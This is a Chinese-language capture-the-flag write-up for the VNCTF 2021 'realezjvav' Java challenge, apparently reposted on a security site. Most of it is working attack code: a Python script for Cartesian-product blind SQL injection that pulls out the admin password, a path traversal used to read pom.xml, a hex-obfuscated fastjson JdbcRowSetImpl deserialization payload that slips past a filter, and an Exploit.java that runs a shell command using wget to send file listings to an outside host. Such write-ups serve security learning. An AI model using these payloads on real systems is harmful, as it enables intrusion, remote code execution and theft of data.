![[VNCTF 2021]realezjvav-华盟网](https://www.77169.net/wp-content/uploads/2021/03/5-1615858485.jpeg)
文章来源:EDI安全
java题 开局个登陆框 sql注入?
测得在password位置有注入 一个单引号500。
![[VNCTF 2021]realezjvav](https://www.77169.net/wp-content/uploads/2021/03/7-1615858488.png "[VNCTF 2021]realezjvav")
两个单引号正常
![[VNCTF 2021]realezjvav](https://www.77169.net/wp-content/uploads/2021/03/1-1615858489.png "[VNCTF 2021]realezjvav")
fuzz一下 发现过滤的并不多 但是延时函数过滤了 并且貌似不能布尔盲注 搜了下 可以笛卡尔积盲注。
![[VNCTF 2021]realezjvav](https://www.77169.net/wp-content/uploads/2021/03/7-1615858490.png "[VNCTF 2021]realezjvav")
脚本:
import requests
url="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag=''
for i in range(1,50):
f1=flag
top=127
low=33
while low<=top:
mid=(top+low)//2
# p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
# p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
data1={'username':'admin','password':p1}
data2={'username':'admin','password':p2}
try:
print(i,mid)
r1=requests.post(url,data=data1,timeout=1)
except requests.exceptions.ReadTimeout as e:
flag+=chr(mid)
print(flag)
break
except Exception as e:
pass
else:
try:
r2=requests.post(url,data=data2,timeout=1)
except requests.exceptions.ReadTimeout as e:
low=mid+1
except Exception as e:
pass
else:
top=mid-1
if flag==f1:
break
# user
# id,username,password
# no_0ne_kn0w_th1s
注:超时时间要自己测下 有时候比较大 有时候比较小 可能跑的人太多了吧
登陆之后发现
![[VNCTF 2021]realezjvav](https://www.77169.net/wp-content/uploads/2021/03/8-1615858490.png "[VNCTF 2021]realezjvav")
测了下可以目录穿越 任意文件读取 读pom.xml
![[VNCTF 2021]realezjvav](https://www.77169.net/wp-content/uploads/2021/03/6-1615858490.png "[VNCTF 2021]realezjvav")
刚好是有漏洞的版本 并且创建角色的时候刚好是json字符串
参考:https://github.com/CaijiOrz/fastjson-1.2.47-RCE
打一下payload 发现被拦了
![[VNCTF 2021]realezjvav](https://www.77169.net/wp-content/uploads/2021/03/3-1615858491.png "[VNCTF 2021]realezjvav")
前两天刚好在p神的星球看到
![[VNCTF 2021]realezjvav](https://www.77169.net/wp-content/uploads/2021/03/9-1615858492.png "[VNCTF 2021]realezjvav")
刚好可以绕过 修改后的payload:
roleJson={"name":{"x40x74x79x70x65":"java.lang.Class","val":"x63x6fx6dx2ex73x75x6ex2ex72x6fx77x73x65x74x2ex4ax64x62x63x52x6fx77x53x65x74x49x6dx70x6c"},"x":{"x40x74x79x70x65":"x63x6fx6dx2ex73x75x6ex2ex72x6fx77x73x65x74x2ex4ax64x62x63x52x6fx77x53x65x74x49x6dx70x6c","dataSourceName":"ldap://1.1.1.1:1389/Exploit","x61x75x74x6fx43x6fx6dx6dx69x74":true}}
貌似没bash 用dnslog带出来的flag 具体流程参见那篇文章就行了 Exploit.java:
public class Exploit{
public Exploit(){
try{
Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","wget http://1.1.1.1:900/?a=$(ls /|base64 -w0"});
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}
![[VNCTF 2021]realezjvav](https://www.77169.net/wp-content/uploads/2021/03/6-1615858493.png "[VNCTF 2021]realezjvav")
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
![工作组渗透 [ 内网搜集实战 ] [ 上 ]-华盟网](https://www.77169.net/wp-content/uploads/2019/02/1-1550625497.jpeg)
暂无评论内容